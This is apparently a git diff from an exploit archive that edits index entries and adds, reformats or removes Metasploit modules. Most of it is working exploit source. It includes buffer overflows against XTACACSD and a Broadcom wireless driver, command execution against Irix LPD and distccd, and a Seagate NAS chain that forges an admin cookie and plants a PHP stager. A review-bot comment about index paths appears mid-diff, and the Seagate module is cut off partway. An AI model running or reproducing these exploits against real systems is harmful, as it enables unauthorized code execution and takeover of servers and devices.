 39807,platforms/php/webapps/39807.txt,"WordPress Plugin Huge-IT Image Gallery 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
-39808,platforms/windows/webapps/39808.txt,"Trend Micro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
+39808,platforms/windows/webapps/39808.txt,"Trend Micro - 'CoreServiceShell.exe' Multiple HTTP Issues",2016-05-12,"Google Security Research",windows,webapps,37848
 39883,platforms/php/webapps/39883.txt,"WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
 39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80
 39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps,0
@@ -36870,7 +36849,7 @@ id,file,description,date,author,platform,type,port
 39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - Cross-Site Request Forgery (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80
 39969,platforms/php/webapps/39969.php,"WordPress Plugin Gravity Forms 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80
 39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Persistent Cross-Site Scripting",2016-06-17,"David Silveiro",php,webapps,80
-39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers)",2016-06-17,"Paolo Massenio",php,webapps,80
+39971,platforms/php/webapps/39971.php,"phpATM 1.32 (Windows) - Arbitrary File Upload / Remote Command Execution",2016-06-17,"Paolo Massenio",php,webapps,80
 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
 39974,platforms/php/webapps/39974.html,"WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
@@ -37644,7 +37623,6 @@ id,file,description,date,author,platform,type,port
 41674,platforms/php/webapps/41674.txt,"Flippa Clone - SQL Injection",2017-03-23,"Ihsan Sencan",php,webapps,0
 41676,platforms/linux/webapps/41676.rb,"Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)",2014-10-15,Metasploit,linux,webapps,0
 41677,platforms/linux/webapps/41677.rb,"D-Link/TRENDnet - NCC Service Command Injection (Metasploit)",2015-02-26,Metasploit,linux,webapps,0
-41678,platforms/linux/webapps/41678.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)",2015-03-01,Metasploit,linux,webapps,0
 41685,platforms/multiple/webapps/41685.rb,"MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection (Metasploit)",2014-11-18,Metasploit,multiple,webapps,0
 41686,platforms/multiple/webapps/41686.rb,"OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'license.php' Remote Command Execution (Metasploit)",2015-01-25,Metasploit,multiple,webapps,0
 41687,platforms/multiple/webapps/41687.rb,"OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'welcome' Remote Command Execution (Metasploit)",2015-01-05,Metasploit,multiple,webapps,0
diff --git a/platforms/bsd/remote/10035.rb b/platforms/bsd/remote/10035.rb
index 5ef6a7e21..8d6765597 100755
--- a/platforms/bsd/remote/10035.rb
+++ b/platforms/bsd/remote/10035.rb
@@ -1,9 +1,9 @@
 ##
-# $Id$
+# $Id: xtacacsd_report.rb 9262 2010-05-09 17:45:00Z jduck $
 ##
 
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -11,8 +11,8 @@
 
 require 'msf/core'
 
-
 class Metasploit3 < Msf::Exploit::Remote
+	Rank = AverageRanking
 
 	include Msf::Exploit::Remote::Udp
 	include Msf::Exploit::Brute
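Review bot: The index edit in this hunk drops only the 41678 row, while the same commit also deletes platforms/freebsd/remote/16879.rb, platforms/hardware/remote/16387.rb, platforms/irix/remote/16877.rb and platforms/linux/remote/16919.rb, and renames platforms/linux/local/36388.py to platforms/linux/dos/36388.py. None of the files.csv hunks visible here touch rows for those five ids, so unless an earlier hunk outside this view handles them, the index will keep pointing at paths that no longer exist, and the 36388 row will still carry the old `platforms/linux/local/` path with `type` = `local` rather than `dos`. A quick `grep -E '^(16879|16387|16877|16919|36388),' files.csv` on the result would confirm the index and the tree agree before this lands.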
@@ -21,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name' => 'XTACACSD <= 4.1.2 report() Buffer Overflow',
 			'Description' => %q{
-				This module exploits a stack overflow in XTACACSD <= 4.1.2. By
-				sending a specially crafted XTACACS packet with an overly long
-				username, an attacker may be able to execute arbitrary code.
+				This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By
+				sending a specially crafted XTACACS packet with an overly long
+				username, an attacker may be able to execute arbitrary code.
 			},
 			'Author' => 'MC',
-			'Version' => '$Revision$',
-			'References' =>
-				[
+			'Version' => '$Revision: 9262 $',
+			'References' =>
+				[
 					['CVE', '2008-7232'],
 					['OSVDB', '58140'],
 					['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'DisableNops' => 'True',
 				},
 			'Platform' => 'BSD',
-			'Arch' => ARCH_X86,
+			'Arch' => ARCH_X86,
 			'Targets' =>
 				[
 					['FreeBSD 6.2-Release Bruteforce',
@@ -59,8 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DefaultTarget' => 0,
 			'DisclosureDate' => 'Jan 8 2008'))
 
-		register_options([Opt::RPORT(49)], self.class)
-
+		register_options([Opt::RPORT(49)], self.class)
 	end
 
 	def brute_exploit(address)
@@ -80,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		sploit << "\x00\x00\x00\x00" # Result 2
 		sploit << "\x00\x00" # Result 3
 		sploit << make_nops(238 - payload.encoded.length)
-		sploit << payload.encoded + [address['Ret']].pack('V')
+		sploit << payload.encoded + [address['Ret']].pack('V')
 
-		print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
+		print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
 		udp_sock.put(sploit)
-
-		disconnect_udp
+
+		disconnect_udp
 	end
 
 end
diff --git a/platforms/freebsd/remote/16879.rb b/platforms/freebsd/remote/16879.rb
deleted file mode 100755
index 8d6765597..000000000
--- a/platforms/freebsd/remote/16879.rb
+++ /dev/null
@@ -1,90 +0,0 @@ -## -# $Id: xtacacsd_report.rb 9262 2010-05-09 17:45:00Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = AverageRanking - - include Msf::Exploit::Remote::Udp - include Msf::Exploit::Brute - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'XTACACSD <= 4.1.2 report() Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By - sending a specially crafted XTACACS packet with an overly long - username, an attacker may be able to execute arbitrary code. - }, - 'Author' => 'MC', - 'Version' => '$Revision: 9262 $', - 'References' => - [ - ['CVE', '2008-7232'], - ['OSVDB', '58140'], - ['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'], - ], - 'Payload' => - { - 'Space' => 175, - 'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20", - 'StackAdjustment' => -3500, - 'PrependEncoder' => "\x83\xec\x7f", - 'DisableNops' => 'True', - }, - 'Platform' => 'BSD', - 'Arch' => ARCH_X86, - 'Targets' => - [ - ['FreeBSD 6.2-Release Bruteforce', - {'Bruteforce' => - { - 'Start' => { 'Ret' => 0xbfbfea00 }, - 'Stop' => { 'Ret' => 0xbfbfef00 }, - 'Step' => 24, - } - }, - ], - ], - 'Privileged' => true, - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jan 8 2008')) - - register_options([Opt::RPORT(49)], self.class) - end - - def brute_exploit(address) - connect_udp - - sploit = "\x80" # Version - sploit << "\x05" # Type: Connect - sploit << "\xff\xff" # Nonce - sploit << "\xff" # Username length - sploit << "\x00" # Password length - sploit << "\x00" # Response - sploit << "\x00" # Reason - sploit << "\xff\xff\xff\xff" # Result 1 - sploit << "\xff\xff\xff\xff" # Destination address - sploit << "\xff\xff" # 
Destination port - sploit << "\xff\xff" # Line - sploit << "\x00\x00\x00\x00" # Result 2 - sploit << "\x00\x00" # Result 3 - sploit << make_nops(238 - payload.encoded.length) - sploit << payload.encoded + [address['Ret']].pack('V') - - print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...") - udp_sock.put(sploit) - - disconnect_udp - end - -end diff --git a/platforms/hardware/remote/16387.rb b/platforms/hardware/remote/16387.rb deleted file mode 100755 index 8e74910e8..000000000 --- a/platforms/hardware/remote/16387.rb +++ /dev/null 
@@ -1,206 +0,0 @@ -## -# $Id: broadcom_wifi_ssid.rb 9669 2010-07-03 03:13:45Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = LowRanking - - include Msf::Exploit::Lorcon2 - include Msf::Exploit::KernelMode - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in the Broadcom Wireless driver - that allows remote code execution in kernel mode by sending a 802.11 probe - response that contains a long SSID. The target MAC address must - be provided to use this exploit. The two cards tested fell into the - 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. - - This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation - (external/ruby-lorcon/README) for more information. 
- }, - 'Author' => - [ - 'Chris Eagle', # initial discovery - 'Johnny Cache ', # the man with the plan - 'skape', # windows kernel ninjitsu and debugging - 'hdm' # porting the C version to ruby - ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9669 $', - 'References' => - [ - ['CVE', '2006-5882'], - ['OSVDB', '30294'], - ['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'], - ], - 'Privileged' => true, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 500 - }, - 'Platform' => 'win', - 'Targets' => - [ - # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) - [ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10', - { - 'Ret' => 0x8066662c, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dbb27, - - } - } - } - ], - - # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) - [ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10', - { - 'Ret' => 0x804f16eb, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dc0c7, - } - } - } - ] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Nov 11 2006' - )) - - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) - ], self.class) - end - - def exploit - open_wifi - - stime = Time.now.to_i - - print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...") - - while (stime + datastore['RUNTIME'].to_i > Time.now.to_i) - - select(nil, nil, nil, 0.02) - wifi.write(create_response) - - select(nil, nil, nil, 0.01) - 
wifi.write(create_beacon) - - break if session_created? - - end - - print_status("Finished sending frames...") - end - - def create_beacon - src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 - dst = eton('FF:FF:FF:FF:FF:FF') - seq = [Time.now.to_i % 4096].pack('n') - - blob = create_frame - blob[0,1] = 0x80.chr - blob[4,6] = dst - blob[10,6] = src - blob[16,6] = src - blob[22,2] = seq - - blob - end - - def create_response - src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 - dst = eton(datastore['ADDR_DST']) - seq = [Time.now.to_i % 256].pack('n') - - blob = create_frame - blob[0,1] = 0x50.chr - blob[4,6] = dst - blob[10,6] = src - blob[16,6] = src # bssid field, good idea to set to src. - blob[22,2] = seq - - blob - end - - def create_frame - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - "\x58\x58\x58\x58\x58\x58" + # src - "\x58\x58\x58\x58\x58\x58" + # bssid - "\x70\xed" + # sequence number - - # - # fixed parameters - # - - # timestamp value - rand_text_alphanumeric(8) + - "\x64\x00" + # beacon interval - "\x11\x04" + # capability flags - - # - # tagged parameters - # - - # ssid tag - "\x00" + # tag: SSID parameter set - "\x5d" + # len: length is 93 bytes - - # jump into the payload - "\x89\xf9" + # mov edi, ecx - "\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b - "\xff\xe1" + # jmp ecx - - # padding - rand_text_alphanumeric(79) + - - # return address - [target.ret].pack('V') + - - # vendor specific tag - "\xdd" + # wpa - "\xff" + # big as we can make it - - # the kernel-mode stager - payload.encoded - end - -end diff --git a/platforms/irix/remote/10033.rb b/platforms/irix/remote/10033.rb index c363a1824..307247d06 100755 --- a/platforms/irix/remote/10033.rb +++ b/platforms/irix/remote/10033.rb 
@@ -1,32 +1,31 @@
 ##
-# $Id$
+# $Id: tagprinter_exec.rb 10561 2010-10-06 00:53:45Z hdm $
 ##
 
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
 
-
 require 'msf/core'
 
-
 class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::Tcp
 
 	def initialize(info = {})
-		super(update_info(info,
+		super(update_info(info,
 			'Name' => 'Irix LPD tagprinter Command Execution',
 			'Description' => %q{
-				This module exploits an arbitrary command execution flaw in
-				the in.lpd service shipped with all versions of Irix.
+				This module exploits an arbitrary command execution flaw in
+				the in.lpd service shipped with all versions of Irix.
 			},
 			'Author' => [ 'optyx', 'hdm' ],
 			'License' => MSF_LICENSE,
-			'Version' => '$Revision$',
+			'Version' => '$Revision: 10561 $',
 			'References' =>
 				[
 					['CVE', '2001-0800'],
@@ -45,18 +44,18 @@ class Metasploit3 < Msf::Exploit::Remote
 							'PayloadType' => 'cmd',
 							'RequiredCmd' => 'generic telnet',
 						}
-				},
-			'Targets' =>
+				},
+			'Targets' =>
 				[
 					[ 'Automatic Target', { }]
 				],
 			'DisclosureDate' => 'Sep 01 2001',
 			'DefaultTarget' => 0))
-
-		register_options(
-			[
-				Opt::RPORT(515)
-			], self.class)
+
+		register_options(
+			[
+				Opt::RPORT(515)
+			], self.class)
 	end
 
 	def check
@@ -64,14 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote
 		sock.put("T;uname -a;\n")
 		resp = sock.get_once
 		disconnect
-
+
 		if (resp =~ /IRIX/)
 			print_status("Response: #{resp.strip}")
 			return Exploit::CheckCode::Vulnerable
 		end
 		return Exploit::CheckCode::Safe
 	end
-
+
 	def exploit
 		connect
 		sock.put("T;#{payload.encoded};\n")
diff --git a/platforms/irix/remote/16877.rb b/platforms/irix/remote/16877.rb
deleted file mode 100755
index 307247d06..000000000
--- a/platforms/irix/remote/16877.rb
+++ /dev/null
@@ -1,81 +0,0 @@
-##
-# $Id: tagprinter_exec.rb 10561 2010-10-06 00:53:45Z hdm $
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
-
-	include Msf::Exploit::Remote::Tcp
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name' => 'Irix LPD tagprinter Command Execution',
-			'Description' => %q{
-				This module exploits an arbitrary command execution flaw in
-				the in.lpd service shipped with all versions of Irix.
-			},
-			'Author' => [ 'optyx', 'hdm' ],
-			'License' => MSF_LICENSE,
-			'Version' => '$Revision: 10561 $',
-			'References' =>
-				[
-					['CVE', '2001-0800'],
-					['OSVDB', '8573'],
-					['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
-				],
-			'Privileged' => false,
-			'Platform' => ['unix', 'irix'],
-			'Arch' => ARCH_CMD,
-			'Payload' =>
-				{
-					'Space' => 512,
-					'DisableNops' => true,
-					'Compat' =>
-						{
-							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic telnet',
-						}
-				},
-			'Targets' =>
-				[
-					[ 'Automatic Target', { }]
-				],
-			'DisclosureDate' => 'Sep 01 2001',
-			'DefaultTarget' => 0))
-
-		register_options(
-			[
-				Opt::RPORT(515)
-			], self.class)
-	end
-
-	def check
-		connect
-		sock.put("T;uname -a;\n")
-		resp = sock.get_once
-		disconnect
-
-		if (resp =~ /IRIX/)
-			print_status("Response: #{resp.strip}")
-			return Exploit::CheckCode::Vulnerable
-		end
-		return Exploit::CheckCode::Safe
-	end
-
-	def exploit
-		connect
-		sock.put("T;#{payload.encoded};\n")
-		handler
-		print_status("Payload: #{payload.encoded}")
-	end
-
-end
diff --git a/platforms/linux/local/36388.py b/platforms/linux/dos/36388.py
similarity index 100%
rename from platforms/linux/local/36388.py
rename to platforms/linux/dos/36388.py
diff --git a/platforms/linux/remote/16919.rb b/platforms/linux/remote/16919.rb
deleted file mode 100755
index 2e53a035d..000000000
--- a/platforms/linux/remote/16919.rb
+++ /dev/null
@@ -1,132 +0,0 @@ -## -# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'DistCC Daemon Command Execution', - 'Description' => %q{ - This module uses a documented security weakness to execute - arbitrary commands on any system running distccd. - - }, - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9669 $', - 'References' => - [ - [ 'CVE', '2004-2687'], - [ 'OSVDB', '13378' ], - [ 'URL', 'http://distcc.samba.org/security.html'], - - ], - 'Platform' => ['unix'], - 'Arch' => ARCH_CMD, - 'Privileged' => false, - 'Payload' => - { - 'Space' => 1024, - 'DisableNops' => true, - 'Compat' => - { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic perl ruby bash telnet', - } - }, - 'Targets' => - [ - [ 'Automatic Target', { }] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Feb 01 2002' - )) - - register_options( - [ - Opt::RPORT(3632) - ], self.class) - end - - def exploit - connect - - distcmd = dist_cmd("sh", "-c", payload.encoded); - sock.put(distcmd) - - dtag = rand_text_alphanumeric(10) - sock.put("DOTI0000000A#{dtag}\n") - - res = sock.get_once(24, 5) - - if !(res and res.length == 24) - print_status("The remote distccd did not reply to our request") - disconnect - return - end - - # Check STDERR - res = sock.get_once(4, 5) - res = sock.get_once(8, 5) - len = [res].pack("H*").unpack("N")[0] - - return if not len - if (len > 0) - res = sock.get_once(len, 5) - res.split("\n").each do |line| - print_status("stderr: #{line}") - end - end - - # Check STDOUT - res = 
sock.get_once(4, 5) - res = sock.get_once(8, 5) - len = [res].pack("H*").unpack("N")[0] - - return if not len - if (len > 0) - res = sock.get_once(len, 5) - res.split("\n").each do |line| - print_status("stdout: #{line}") - end - end - - handler - disconnect - end - - - # Generate a distccd command - def dist_cmd(*args) - - # Convince distccd that this is a compile - args.concat(%w{# -c main.c -o main.o}) - - # Set distcc 'magic fairy dust' and argument count - res = "DIST00000001" + sprintf("ARGC%.8x", args.length) - - # Set the command arguments - args.each do |arg| - res << sprintf("ARGV%.8x%s", arg.length, arg) - end - - return res - end - -end - diff --git a/platforms/linux/webapps/41678.rb b/platforms/linux/webapps/41678.rb deleted file mode 100755 index 3ee4f5532..000000000 --- a/platforms/linux/webapps/41678.rb +++ /dev/null 
@@ -1,353 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'rexml/document' - -class MetasploitModule < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Seagate Business NAS Unauthenticated Remote Command Execution', - 'Description' => %q{ - Some Seagate Business NAS devices are vulnerable to command execution via a local - file include vulnerability hidden in the language parameter of the CodeIgniter - session cookie. The vulnerability manifests in the way the language files are - included in the code on the login page, and hence is open to attack from users - without the need for authentication. The cookie can be easily decrypted using a - known static encryption key and re-encrypted once the PHP object string has been - modified. - This module has been tested on the STBN300 device. 
- }, - 'Author' => [ - 'OJ Reeves ' # Discovery and Metasploit module - ], - 'References' => [ - ['CVE', '2014-8684'], - ['CVE', '2014-8686'], - ['CVE', '2014-8687'], - ['EDB', '36202'], - ['URL', 'http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/'], - ['URL', 'https://beyondbinary.io/advisory/seagate-nas-rce/'] - ], - 'DisclosureDate' => 'Mar 01 2015', - 'Privileged' => true, - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Payload' => {'DisableNops' => true}, - 'Targets' => [['Automatic', {}]], - 'DefaultTarget' => 0, - 'License' => MSF_LICENSE - )) - - register_options([ - OptString.new('TARGETURI', [true, 'Path to the application root', '/']), - OptString.new('ADMINACCOUNT', [true, 'Name of the NAS admin account', 'admin']), - OptString.new('COOKIEID', [true, 'ID of the CodeIgniter session cookie', 'ci_session']), - OptString.new('XORKEY', [true, 'XOR Key used for the CodeIgniter session', '0f0a000d02011f0248000d290d0b0b0e03010e07']) - ]) - end - - # - # Write a string value to a serialized PHP object without deserializing it first. - # If the value exists it will be updated. - # - def set_string(php_object, name, value) - prefix = "s:#{name.length}:\"#{name}\";s:" - if php_object.include?(prefix) - # the value already exists in the php blob, so update it. - return php_object.gsub("#{prefix}\\d+:\"[^\"]*\"", "#{prefix}#{value.length}:\"#{value}\"") - end - - # the value doesn't exist in the php blob, so create it. - count = php_object.split(':')[1].to_i + 1 - php_object.gsub(/a:\d+(.*)}$/, "a:#{count}\\1#{prefix}#{value.length}:\"#{value}\";}") - end - - # - # Findez ze holez! 
- # - def check - begin - res = send_request_cgi( - 'uri' => normalize_uri(target_uri), - 'method' => 'GET', - 'headers' => { - 'Accept' => 'text/html' - } - ) - - if res && res.code == 200 - headers = res.to_s - - # validate headers - if headers.include?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28') - # and make sure that the body contains the title we'd expect - if res.body.include?('Login to BlackArmor') - return Exploit::CheckCode::Appears - end - end - end - rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - # something went wrong, assume safe. - end - - Exploit::CheckCode::Safe - end - - # - # Executez ze sploitz! - # - def exploit - - # Step 1 - Establish a session with the target which will give us a PHP object we can - # work with. - begin - print_status("Establishing session with target ...") - res = send_request_cgi({ - 'uri' => normalize_uri(target_uri), - 'method' => 'GET', - 'headers' => { - 'Accept' => 'text/html' - } - }) - - if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/ - cookie_value = $1.strip - else - fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.") - end - rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.") - end - - # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly - # then update it so that it's an admin session before re-encrypting - print_status("Upgrading session to administrator ...") - php_object = decode_cookie(cookie_value) - vprint_status("PHP Object: #{php_object}") - - admin_php_object = set_string(php_object, 'is_admin', 'yes') - admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT']) - vprint_status("Admin PHP object: #{admin_php_object}") - - admin_cookie_value = encode_cookie(admin_php_object) - - # Step 3 - Extract the current host configuration so 
that we don't lose it. - host_config = nil - - # This time value needs to be consistent across calls - config_time = ::Time.now.to_i - - begin - print_status("Extracting existing host configuration ...") - res = send_request_cgi( - 'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'), - 'method' => 'GET', - 'headers' => { - 'Accept' => 'text/html' - }, - 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", - 'vars_get' => { - '_' => config_time - } - ) - - if res && res.code == 200 - res.body.split("\r\n").each do |l| - if l.include?('general_setup') - host_config = l - break - end - end - else - fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.") - end - rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.") - end - - print_good("Host configuration extracted.") - vprint_status("Host configuration: #{host_config}") - - # Step 4 - replace the host device description with a custom payload that can - # be used for LFI. We have to keep the payload small because of size limitations - # and we can't put anything in with '$' in it. So we need to make a simple install - # payload which will write a required payload to disk that can be executes directly - # as the last part of the payload. This will also be self-deleting. - param_id = rand_text_alphanumeric(3) - - # There are no files on the target file system that start with an underscore - # so to allow for a small file size that doesn't collide with an existing file - # we'll just prefix it with an underscore. - payload_file = "_#{rand_text_alphanumeric(3)}.php" - - installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));" - stager = Rex::Text.encode_base64(installer) - stager = xml_encode("") - vprint_status("Stager: #{stager}") - - # Butcher the XML directly rather than attempting to use REXML. 
The target XML - # parser is way to simple/flaky to deal with the proper stuff that REXML - # spits out. - desc_start = host_config.index('" description="') + 15 - desc_end = host_config.index('"', desc_start) - xml_payload = host_config[0, desc_start] + - stager + host_config[desc_end, host_config.length] - vprint_status(xml_payload) - - # Step 5 - set the host description to the stager so that it is written to disk - print_status("Uploading stager ...") - begin - res = send_request_cgi( - 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), - 'method' => 'POST', - 'headers' => { - 'Accept' => 'text/html' - }, - 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", - 'vars_get' => { - '_' => config_time - }, - 'vars_post' => { - 'general_setup' => xml_payload - } - ) - - unless res && res.code == 200 - fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).") - end - rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") - end - - print_good("Stager uploaded.") - - # Step 6 - Invoke the stage, passing in a self-deleting php script body. 
- print_status("Executing stager ...") - payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00") - payload_cookie_value = encode_cookie(payload_php_object) - self_deleting_payload = "" - errored = false - - begin - res = send_request_cgi( - 'uri' => normalize_uri(target_uri), - 'method' => 'POST', - 'headers' => { - 'Accept' => 'text/html' - }, - 'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}", - 'vars_post' => { - param_id => Rex::Text.encode_base64(self_deleting_payload) - } - ) - - if res && res.code == 200 - print_good("Stager execution succeeded, payload ready for execution.") - else - print_error("Stager execution failed (invalid result).") - errored = true - end - rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - print_error("Stager execution failed (unable to establish connection).") - errored = true - end - - # Step 7 - try to restore the previous configuration, allowing exceptions - # to bubble up given that we're at the end. This step is important because - # we don't want to leave a trail of junk on disk at the end. - print_status("Restoring host config ...") - res = send_request_cgi( - 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), - 'method' => 'POST', - 'headers' => { - 'Accept' => 'text/html' - }, - 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", - 'vars_get' => { - '_' => config_time - }, - 'vars_post' => { - 'general_setup' => host_config - } - ) - - # Step 8 - invoke the installed payload, but only if all went to plan. 
